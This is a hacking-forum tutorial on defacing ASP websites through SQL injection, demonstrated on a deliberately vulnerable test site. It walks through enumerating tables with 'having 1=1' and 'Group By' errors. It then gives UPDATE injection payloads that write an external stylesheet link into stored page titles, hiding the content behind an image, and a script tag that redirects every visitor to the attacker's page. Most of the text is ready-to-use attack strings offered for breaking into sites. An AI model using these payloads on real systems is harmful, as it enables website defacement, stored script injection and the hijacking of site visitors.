[TUT] How to (HaCk windows server site Via) injected Image & full Index [TUT]

Hi everyone,Today I'll show you How to (HaCk windows server site Via) injected Image & full Index

Before they are following the recommended read this thread

PHP Code:

http://www.hackforums.net/showthread.php?tid=2607881 

☆¸.•*☆ let's go ☆*•.¸☆

:: Site to explain method on it ::

PHP Code:

http://testasp.vulnweb.com/showthread.asp?id=1 

First we need to extract ( all table and column ) to continuo 

now to do that we will using having 1=1 to extract table and column

☆¸.•*☆ :: demo :: ☆*•.¸☆

PHP Code:

testasp.vulnweb.com/showthread.asp?id=1 having 1=1 

threads.title

table = threads
column = title

Ok now to extract Other table and column we will using Group+By 

like

PHP Code:

http://testasp.vulnweb.com/showthread.asp?id=1 Group+By threads.title having 1=1 

ok it's No other table and column 

now to inject pictures to prove hacked on site 

First we need to this code 

PHP Code:

BODY {
 SCROLLBAR-FACE-COLOR: black; SCROLLBAR-HIGHLIGHT-COLOR: black;  SCROLLBAR-SHADOW-COLOR: darkgray; SCROLLBAR-3DLIGHT-COLOR: #ee;  SCROLLBAR-ARROW-COLOR: black; SCROLLBAR-TRACK-COLOR: gray;  SCROLLBAR-DARKSHADOW-COLOR: black } A:link {
 COLOR: darkblue; TEXT-DECORATION: none } A:visited {
 COLOR: #000088; TEXT-DECORATION: none } A:hover {
 COLOR: black } body, td, th {
 color: black;
} table, p, td, t
{
 visibility:hidden;
} body {
 background-color: black;
 background-image:url('img link');
 background-repeat:no-repeat;
 background-position:top;
} 

Replace [img link]in this code via your image link

ok i have image here

PHP Code:

http://i.imgur.com/yQ4P5.jpg 

now the code after adding your image link will be like

PHP Code:

BODY {
 SCROLLBAR-FACE-COLOR: black; SCROLLBAR-HIGHLIGHT-COLOR: black;  SCROLLBAR-SHADOW-COLOR: darkgray; SCROLLBAR-3DLIGHT-COLOR: #ee;  SCROLLBAR-ARROW-COLOR: black; SCROLLBAR-TRACK-COLOR: gray;  SCROLLBAR-DARKSHADOW-COLOR: black } A:link {
 COLOR: darkblue; TEXT-DECORATION: none } A:visited {
 COLOR: #000088; TEXT-DECORATION: none } A:hover {
 COLOR: black } body, td, th {
 color: black;
} table, p, td, t
{
 visibility:hidden;
} body {
 background-color: black;
 background-image:url('http://i.imgur.com/yQ4P5.jpg');
 background-repeat:no-repeat;
 background-position:top;
} 

Now save the code in txt file like css.css 

ok : now we will uploading the file css.css to a direct link

☆¸.•*☆ ok now I uploaded this file to my (domain) and now i have direct link to this file [ css.css ] ☆*•.¸☆

PHP Code:

http://lovern.doomby.com/medias/files/css.css 

ok now we will put file css link in this code

PHP Code:

'<link href=css.css_file rel=stylesheet>;--' 

☆¸.•*☆ like ☆*•.¸☆

PHP Code:

'<link href=http://lovern.doomby.com/medias/files/css.css rel=stylesheet>;--' 

now the exploitation will be like

PHP Code:

+Update+threads+Set+title='<link href=http://lovern.doomby.com/medias/files/css.css rel=stylesheet>;--' 

ok now we will try on our vlu site

☆¸.•*☆ demo ☆*•.¸☆

PHP Code:

testasp.vulnweb.com/showthread.asp?id=1+Update+threads+Set+title='<link href=http://lovern.doomby.com/medias/files/css.css rel=stylesheet>;--' 

 well done black rose good work 

ok now I'll show you How to inject your (index) 

☆¸.•*☆ our code ☆*•.¸☆

PHP Code:

'<script>location.replace("your index here");</script>' 

☆¸.•*☆ my index ☆*•.¸☆

PHP Code:

http://lovern.doomby.com/medias/files/this-is-just-a-test-2.html 

now the exploitation will be like

PHP Code:

+Update+threads+Set+title='<script>location.replace("http://lovern.doomby.com/medias/files/this-is-just-a-test-2.html");</script>' 

:: demo ::

PHP Code:

testasp.vulnweb.com/showthread.asp?id=1+Update+threads+Set+title='<script>location.replace("http://lovern.doomby.com/medias/files/this-is-just-a-test-2.html");</script>' 

Thread end ..

Thank's for reading  I hope that helped you